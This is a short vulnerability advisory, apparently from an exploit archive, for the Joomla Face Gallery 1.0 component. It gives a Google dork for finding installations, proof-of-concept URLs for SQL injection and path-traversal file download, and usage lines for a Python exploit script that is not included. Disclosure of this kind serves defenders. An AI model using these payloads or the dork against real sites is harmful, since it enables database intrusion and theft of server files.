######################
# Exploit Title : Joomla Face Gallery 1.0 Multiple Vulnerabilities
# Exploit Author : Claudio Viviani
# Vendor Homepage : https://www.apptha.com
# Software Link : https://www.apptha.com/downloadable/download/sample/sample_id/150
# Dork Google: inurl:option=com_facegallery
# Date : 2014-09-17
# Tested on : Windows 7 / Mozilla Firefox
# Linux / Mozilla Firefox
# Info:
# Joomla Face Gallery 1.0 suffers from SQL injection and Arbitrary file download vulnerabilities
# PoC Exploit:
#
# http://localhost/index.php?option=com_facegallery&view=images&aid=[SQLi]&lang=en
# http://localhost/index.php?option=com_facegallery&task=imageDownload&img_name=[../../filename]
# "aid" and "img_name" variables are not sanitized.
######################
Discovered By : Claudio Viviani
http://www.homelab.it
[email protected]
[email protected]
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
#####################
Download
Download Exploit: HERE
Exploit Usage
python j00ml4_face_gallery_10_afd.py -t http[s]://localhost[:PORT]
python j00ml4_face_gallery_10_afd.py -t http[s]://localhost/basedir[:PORT]